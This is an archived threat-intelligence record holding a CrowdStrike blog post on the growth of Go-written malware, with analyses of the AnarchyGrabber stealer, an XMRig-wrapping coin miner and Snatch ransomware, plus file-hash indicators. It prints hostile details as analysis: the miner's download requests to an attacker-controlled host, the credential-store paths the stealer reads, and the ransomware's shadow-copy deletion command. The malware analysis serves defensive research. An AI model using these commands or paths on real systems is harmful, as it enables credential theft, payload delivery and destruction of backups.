{
	"id": "2b51fa12-5e73-4cb4-b6fe-fa2d60c4b4b7",
	"created_at": "2026-04-06T01:32:00.012425Z",
	"updated_at": "2026-04-10T03:24:58.216524Z",
	"deleted_at": null,
	"sha1_hash": "c55cbffd1f77c096e11f76e70597d331c07219c5",
	"title": "Financial Motivation Drives Golang Malware Adoption | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 958636,
	"plain_text": "Financial Motivation Drives Golang Malware Adoption | CrowdStrike\r\nBy Anmol Maurya\r\nArchived: 2026-04-06 00:43:09 UTC\r\n\r\nGolang malware popularity snowballs, increasing by 80% from June to August 2021\r\neCrime turns to Golang because of its versatility, enabling cross-compiling for other operating systems\r\nCryptocurrency miners earn the largest share of total Golang malware — 70% in August compared to 54% in June 2021\r\n\r\nCrowdStrike researchers uncovered an 80% increase in Golang (Go)-written malware samples from June to August 2021, according to CrowdStrike threat telemetry. In terms of malware type, first place goes to coin miners, accounting for 70% of the malware spectrum in August 2021. Golang’s versatility in enabling the same codebase to be compiled for all major operating systems, coupled with the financial incentive offered by coin miners, could be one of the driving factors behind the recent wave of Go-written malware. Moreover, we will likely see more Go-based malware as the language becomes more popular with developers.\r\n\r\nGolang’s versatility has turned it into a one-stop shop for financially motivated eCrime developers. Instead of rewriting malware for Windows, macOS and Linux, eCriminals can use Golang to cross-compile the same codebase with ease, allowing them to target multiple platforms effortlessly. Other applications for Golang involve using it as a wrapper for various eCrime malware, such as ransomware. Some ransomware variants turned to Golang wrappers to make analysis more difficult for security researchers. Besides coin miners, password-stealing trojans and downloaders developed in Golang are also popular. These can potentially be handy to the eCrime community, especially access brokers, as they can serve as initial access and information harvesting tools into targeted systems and infrastructure. Whether Go-written malware is used to generate profit from victims by exploiting their computing power, or used as a tool to collect and potentially sell sensitive data and access into compromised infrastructures, financial motivation fuels eCrime adoption of Go-powered threats.\r\n\r\nFigure 1. Daily Golang-written malware evolution (June-August 2021)\r\nhttps://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/\r\nPage 1 of 10\r\n\r\neCrime dominates the threat landscape, making up 79% of interactive intrusion activity, according to the recent CrowdStrike 2021 Threat Hunting Report. Most Go-written malware seems focused on generating revenue by exploiting the computing power of its victims and mining for cryptocurrency. Coin miners accounted for 54% of all Go-written malware in June 2021, 62% in July and 70% in August, according to CrowdStrike threat telemetry.\r\n\r\nFigure 2. Golang-written malware distribution in June, July and August 2021\r\n\r\nWhile 91% of identified Golang malware samples are compiled to target the Windows operating system, 8% are compiled for macOS and 1% for Linux. Golang allows developers to use the same codebase and compile their code for Windows, Linux and macOS, but eCrime developers are likely targeting Windows more because of its potential market share. Some of the more exotic malware families that we’ve identified as using Go revolve around ransomware such as GoGoogle ransomware, Ekans ransomware, eCh0raix ransomware and Snatch ransomware, as well as remote access trojans (RATs), such as CYBORG SPIDER’s Pysa Golang RAT.\r\n\r\nFigure 3. File type distribution of Golang malware (June-August 2021)\r\n\r\nUnusually, we did find instances where it’s not immediately apparent which cryptocurrency some coin miners are attempting to mine. While most coin miners are usually XMRig wrappers, developers likely wanted to give themselves the option of mining for any cryptocurrency that’s appealing at the time of infection.\r\n\r\nWhy Stay When You Can GO?\r\n\r\nOne reason malware developers may not stay faithful to traditional programming languages — such as C++ or Python — and choose to go with Go could be because Go performs 40 times faster than optimized Python code, according to benchmarking tests. Also, a single codebase can be compiled for all major operating systems. When analyzing Go-written malware, we generally need to focus on “main” functions. However, because of the large size of the samples, there’s also the added burden of going through many functions, unlike C/C++ where we usually find fewer. When Go compiles an executable, it also includes Go standard symbols in the binary, which can substantially increase the size of an executable. Golang binaries include a .gopclntab structure, which maps each symbol name to its corresponding offset. The structure also contains the symbol names of functions created by the developer, prefixed with the string \"main,\" which is why we generally focus on \"main\" functions. Adding obfuscation on top of all of this, using open-source tools such as “gobfuscate” — which allow malware developers to compile Go binaries from obfuscated source code — can significantly hamper reverse engineering efforts in terms of deciphering the malicious binary. Looking at threat telemetry from June to August 2021, three different Go-written malware samples were analyzed as case studies to identify some of the Golang-based malware's capabilities. Next is a summary analysis of three different types of malware built using Golang.\r\n\r\nGO-written AnarchyGrabber Password Stealer\r\n\r\nA new Go-written AnarchyGrabber password stealer variant was spotted on Sept. 1, 2021, packing many of the same features as its C++ counterpart. The analyzed sample (SHA256 hash 86dda1e904475fdf187af0cb13c0b67951e95230ed2bc6a3ac79c292606fda8e) behaves in much the same way, stealing the victim’s Discord user token and using the platform to spread additional malware via the victim’s friends list. AnarchyGrabber can steal passwords and usernames from Google Chrome/Brave and tokenlog the user’s Discord account, as shown in Table 1 below. It will then use a webhook to broadcast the victim’s passwords and user profiles from browsers, email address, login name, user token, passwords and IP address to a Discord channel operated by the threat actor. Using Discord as a C2 server for both exfiltrating data and accepting commands is not uncommon, and the Go-written variant of AnarchyGrabber perfectly emulates the behavior of its C++ version.\r\n\r\nmain.grab_discord \\AppData\\Roaming\\Discord\\Local Storage\\\r\nmain.grab_discord_canary \\\\Discordcanary\\\\Local Storage\\\\\r\nmain.grab_discord_ptb \\\\discordptb\\\\Local Storage\\\\\r\nmain.grab_google_chrome \\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login\r\nmain.grab_opera \\Opera Software\\Opera Stable\\Local Storage\\\r\nmain.grab_brave \\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\\r\nmain.grab_yandex \\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\\r\nTable 1. AnarchyGrabber main functions\r\n\r\nThe developers behind this implementation of AnarchyGrabber seem to use some open-source tools for interacting with Discord webhooks or parsing snowflakes, which are uniquely identifiable descriptors for resources that contain a timestamp, such as accounts, messages, channels and servers. The CrowdStrike Falcon® platform detects and protects against this type of Go-written malware using the power of the cloud, on-sensor and in-the-cloud machine learning, and indicators of attack (IOAs) to detect the threat. As the screenshot below illustrates, we detect this sample with our cloud-based machine learning, and it is immediately blocked.\r\n\r\nFigure 4. CrowdStrike Falcon® detection and protection for AnarchyGrabber\r\n\r\nGO(ing) for Crypto Mining\r\n\r\nThe spike in Go-written cryptominers is fueled in part by the language's adaptability. Malware authors either create custom miners or build wrappers for existing miners like XMRig. While creating wrappers is not new, it presents malware developers with the added benefit of allowing them to switch mining between various cryptocurrencies. Depending on which cryptocurrency is more popular or the victim's computing power, threat actors can change which cryptocurrency they want to mine. A recent sample written in Go (SHA256 hash 995d7903e138b3f5aa318d44e959d215c6b28ea491f519af34c8bdad9a0ebda6) is also an XMRig wrapper compiled for Windows and uses a couple of interesting techniques that are unusual among coin miners. Among its more novel features is killing processes that consume too much CPU. Its developers likely want to boost the cryptomining process by killing processes that are not critical, fully utilizing the victim’s computing power for financial gain. Additional features include checking if the malware is already present on the victim’s machine, checking if there’s an instance of the process already running, and downloading other files from an attacker-controlled C2 server.\r\n\r\nmain.FileExists Checks the existence of a file using os.Stat\r\nmain.writetofile Writes to a file using ioutil.WriteFile\r\nmain.isrunning Checks the status of a process using: 1) github_com_mitchellh_go_ps_procCreateToolhelp32Snapshot 2) github_com_mitchellh_go_ps_procProcess32First\r\nmain.killprocess Kills a process; the attacker uses taskkill\r\nmain.DownloadFile GETs files from the web server:\r\n“GET /d/windowsupdatev1.json HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\n“GET /d/inj.exe HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\n“GET /d/runtime.dll HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\n“GET /d/autoupdate.exe HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\n“GET /d/updater.exe HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\n“GET /d/procdump.exe HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\n“GET /d/service.exe HTTP/1.1\r\nHost: m\u003c.\u003ewindowsupdatesupport\u003c.\u003eorg\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip”\r\nmain.getcpuusage Uses the ps command to sort output based on RAM usage: “ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%mem | head -n 2 | tail -n “ It uses this to kill processes that are utilizing too much RAM\r\nTable 2. Coin miner main functions\r\n\r\nUpon execution, this Go-written coin miner downloads the Runtime.dll file containing the debug path (“ C:\\Users\\admin\\Desktop\\toolchain\\deamon\\hide_proc_research\\Hide-Me-From-Task-Manager-master\\HookerDLLBuild\\bin\\x64\\Release\\HookerDLL.pdb ”). It also downloads an open-source command-line utility (Inj.exe) that actors potentially use to inject and eject DLLs, including Runtime.dll. It also uses Procdump.exe (a command was run that is associated with dumping LSASS process memory). Among other features, its developers also included checking the version of the downloaded files to potentially update them should new releases be available, and running daily scheduled tasks with the sample to ensure persistence on the compromised machine. The Falcon platform also detects this particular Go-written coin miner using machine learning and IOAs. As shown in Figure 5, our machine learning can block at the initial stage of an attack and uses IOAs triggered by various tactics and techniques.\r\n\r\nFigure 5. CrowdStrike Falcon® uses machine learning and IOAs of the tactics and techniques of the Golang-written coin miner\r\n\r\nGO Snatch, Go!\r\n\r\nSnatch ransomware has been around since 2018, featuring multiple 32-bit and 64-bit implementations written in Golang. This is a perfect example of Golang being more than just a fad: an actual “go-to” programming language that malware developers actively use. In fact, our own telemetry from June to August 2021 shows that Go-written malware accounted for 7% of all samples. After making its debut around late 2018, Snatch ransomware has been on and off the radar of security companies and researchers ever since. It has constantly been updated and improved with new anti-forensic features and various capabilities, as with any ransomware family.\r\n\r\nAnalyzing one of the more recent Snatch ransomware samples that’s compiled explicitly for Windows (e4b2d60cea9c09a7871d0f94fe9ca38010ef8e552f67e7cdec7489d2a1818354), not much has changed in terms of how previous researchers described the inner workings of the ransomware. It uses the “ujvxadjxkoz” file extension for encrypted files. It places a \"HOW TO RESTORE YOUR FILES.TXT\" file in all the compromised folders. It continues to rely on the Golang openpgp package for operations on OpenPGP messages. However, some of the changes implemented by this particular Snatch ransomware sample involve changes to the exclusion list of directories that are skipped during encryption: Program Files, ProgramData, Default User, recovery, $recycle.bin, perflogs, common files, dvd maker, msbuild, microsoft games, mozilla firefox, tap-windows, windows defender, windows journal, windows mail, windows nt, windows sidebar, microsoft.net, microsoft, start menu, templates, favorites.\r\n\r\nAs seen in Figure 6, Snatch ransomware starts by initializing the main structures necessary for Golang malware execution and then uses the main_decodeString function to decode its encrypted data, which was first encoded with Base64 and then XOR-encrypted using the key “mjkHreiUxqcTSyhWnbDXYuE.”\r\n\r\nFigure 6. Snatch ransomware main_init functions\r\n\r\nThe main_makeBatFile function creates a .bat file, named by main_randomBatFileName, containing the commands “ SC QUERY | FINDSTR SERVICE_NAME ” and “ vssadmin delete shadows /all /quiet ”. In this case, it creates a file with the nceirbfjdgljlw.bat filename. In terms of persistence, Snatch ransomware uses the main_runService function to run as a service using the SVC Golang package. Finally, the main_encrypt function is responsible for triggering the encryption process, at the end of which it places a ransom note in every encrypted folder on the victim’s system. The ransom note provides two email addresses for contacting the ransomware operator to negotiate the ransom demand and potentially recover the encryption key.\r\n\r\nFigure 7. Ransom note for Snatch ransomware\r\n\r\nThe Falcon platform detects and protects against this type of Golang-written malware using the power of the cloud, on-sensor and in-the-cloud machine learning, and IOAs to detect the threat. As the screenshot below illustrates, we detect this sample with our cloud-based machine learning, and it is immediately blocked.\r\n\r\nFigure 8. CrowdStrike Falcon® using machine learning for detecting and preventing Snatch ransomware\r\n\r\nNote: More detailed intelligence and technical information about Snatch ransomware is available to CrowdStrike customers through the Falcon console.\r\n\r\nGolang Is Here to Stay\r\n\r\nGolang-written malware is not a fad and will not go away anytime soon. If anything, we are seeing an increase in Golang being used by malware developers and adversaries. This is likely in step with how we see Go being adopted by the general programming community as its features and capabilities have improved. Golang has proven to be a sufficiently versatile programming language that can accommodate any malware, although coin miners currently seem to pique the interest of developers. CrowdStrike will continue to monitor the evolution of the malware threat landscape and use the power of machine learning and IOAs to detect and protect endpoints from new and unknown malware.\r\n\r\nIndicators of Compromise (IOCs)\r\nFile SHA256\r\nAnarchyGrabber 86dda1e904475fdf187af0cb13c0b67951e95230ed2bc6a3ac79c292606fda8e\r\nCoin Miner 995d7903e138b3f5aa318d44e959d215c6b28ea491f519af34c8bdad9a0ebda6\r\nSnatch Ransomware e4b2d60cea9c09a7871d0f94fe9ca38010ef8e552f67e7cdec7489d2a1818354\r\nRuntime.dll 5b3fc771f43d8e67bd8957f7b3d9a49eae80b88e43c13cbf16623623e9028375\r\nInj.exe cc432ca276209849b1e4e36553d12aa87fd4cf1ba2609032986bf82943994774\r\nProcdump.exe c073d88d4240fbd6b7183b126eb0f3617bad8944d7cf924982e2b814170a614f\r\n\r\nAdditional Resources\r\nVisit the product website to learn how the powerful CrowdStrike Falcon® platform provides comprehensive protection across your organization, workers and data, wherever they are located.\r\nGet a full-featured free trial of CrowdStrike Falcon® Prevent™ and see how true next-gen AV performs against today’s most sophisticated threats.\r\n\r\nSource: https://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/financial-motivation-drives-golang-malware-adoption/"
	],
	"report_names": [
		"financial-motivation-drives-golang-malware-adoption"
	],
	"threat_actors": [
		{
			"id": "5bc2bb61-9b32-496f-b54b-61cf3d01969f",
			"created_at": "2023-01-06T13:46:39.246266Z",
			"updated_at": "2026-04-10T02:00:03.259193Z",
			"deleted_at": null,
			"main_name": "GOLD BURLAP",
			"aliases": [
				"CYBORG SPIDER"
			],
			"source_name": "MISPGALAXY:GOLD BURLAP",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775439120,
	"ts_updated_at": 1775791498,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c55cbffd1f77c096e11f76e70597d331c07219c5.pdf",
		"text": "https://archive.orkl.eu/c55cbffd1f77c096e11f76e70597d331c07219c5.txt",
		"img": "https://archive.orkl.eu/c55cbffd1f77c096e11f76e70597d331c07219c5.jpg"
	}
}